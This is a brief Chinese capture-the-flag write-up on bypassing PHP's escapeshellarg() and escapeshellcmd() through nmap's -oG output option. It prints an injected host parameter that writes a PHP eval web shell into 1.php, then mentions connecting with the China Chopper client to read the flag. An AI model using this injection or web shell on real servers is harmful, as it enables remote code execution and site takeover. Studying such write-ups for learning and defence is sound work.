这道题真的挺不常见的,考的点也有点不常见
打开题目
一段代码这里就有两个不常见的函数escapeshellarg()和escapeshellcmd(),
PHP escapeshellarg()+escapeshellcmd() 之殇 给大家放个链接来理解
大概来说就是这两个函数对我们传入的数值进行单引号转义,会加上/符号,那这时候就只能往后看看能不能利用namp做点文章。
在nmap中有一个参数-oG,就是将命令和结果都写入到文件,到这里我们就可以想到上传一句话,然后写入到php文件里
?host=' <?php @eval($_POST["hack"]);?> -oG 1.php ' //写入一句话到1.php文件中
这个是上传的路径,我们直接用菜刀连接
拿到flag